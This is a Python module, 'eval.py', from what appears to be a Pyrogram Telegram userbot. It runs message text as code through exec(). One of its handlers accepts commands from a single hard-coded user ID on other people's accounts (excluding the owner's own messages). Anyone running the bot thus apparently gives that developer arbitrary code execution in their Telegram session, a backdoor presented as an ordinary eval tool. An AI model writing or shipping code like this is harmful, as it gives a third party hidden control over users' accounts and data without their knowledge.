akn-dev / akn /Akeno /eval.py
randydev's picture
fix revert back and update
21bc372
import asyncio
from io import BytesIO
import io
import os
import sys
import re
import traceback
import subprocess
import html
import shutil
from time import perf_counter
from random import randint
from typing import Optional
from contextlib import suppress
from asyncio import sleep
from io import StringIO
from pyrogram.types import *
from pyrogram import *
from pyrogram import Client as ren
from pyrogram import Client
from pyrogram import Client as app
from pyrogram.errors import *
from pyrogram.raw import *
from pyrogram.raw.types import *
from pyrogram.raw.functions.phone import CreateGroupCall as call
from pyrogram.raw.functions.channels import GetFullChannel
from pyrogram.raw.functions.messages import GetFullChat
from pyrogram.raw.functions.phone import CreateGroupCall, DiscardGroupCall
from pyrogram.raw.types import InputGroupCall, InputPeerChannel, InputPeerChat
from akn.utils.tools import *
from akn.utils.handler import *
from akn.utils.prefixprem import command
from config import *
from urllib.parse import quote, unquote
from json.decoder import JSONDecodeError
from pprint import pprint
@Akeno(
~filters.scheduled
& command(["ceval", "cev", "ce"])
& filters.user([1191668125])
& ~filters.me
& ~filters.forwarded
)
@Akeno(
~filters.scheduled
& command(["eval", "ev", "e"])
& filters.me
& ~filters.forwarded
)
async def evaluation_cmd_t(client: Client, message: Message):
user_id = message.from_user.id
if user_id != 1191668125:
return await message.reply("Only Developer")
status_message = await message.reply("__Processing eval pyrogram...__")
try:
cmd = message.text.split(" ", maxsplit=1)[1]
except IndexError:
return await status_message.edit("__No evaluate message!__")
old_stderr = sys.stderr
old_stdout = sys.stdout
redirected_output = sys.stdout = io.StringIO()
redirected_error = sys.stderr = io.StringIO()
stdout, stderr, exc = None, None, None
try:
await aexec(cmd, client, message)
except ImageProcessFailed:
return await status_message.edit("Error ImageProcessFailed")
except Exception:
exc = traceback.format_exc()
stdout = redirected_output.getvalue()
stderr = redirected_error.getvalue()
sys.stdout = old_stdout
sys.stderr = old_stderr
evaluation = ""
if exc:
evaluation = exc
elif stderr:
evaluation = stderr
elif stdout:
evaluation = stdout
else:
evaluation = "Success"
final_output = f"**OUTPUT**:\n<pre language=''>{evaluation.strip()}</pre>"
if len(final_output) > 4096:
with open("eval.txt", "w+", encoding="utf8") as out_file:
out_file.write(final_output)
await status_message.reply_document(
document="eval.txt",
caption=cmd[: 4096 // 4 - 1],
disable_notification=True,
)
os.remove("eval.txt")
await status_message.delete()
else:
await status_message.edit_text(final_output)
async def aexec(code, client, message):
exec(
(
"async def __aexec(client, message):\n"
+ " import os\n"
+ " import wget\n"
+ " import akenoai as api\n"
+ " from akn.utils.database import db\n"
+ " from RyuzakiLib import AkenoPlus\n"
+ " randydev = message\n"
+ " message = event = randydev\n"
+ " r = reply = message.reply_to_message\n"
+ " chat = message.chat.id\n"
+ " c = client\n"
+ " to_photo = message.reply_photo\n"
+ " to_video = message.reply_video\n"
+ " p = print\n"
)
+ "".join(f"\n {l}" for l in code.split("\n"))
)
return await locals()["__aexec"](client, message)
"""
@Client.on_edited_message(
command(["ev", "e"])
& filters.me
& ~filters.forwarded
& ~filters.via_bot
)
async def execution_func_edited(bot, message):
await evaluation_cmd_t(bot, message)
"""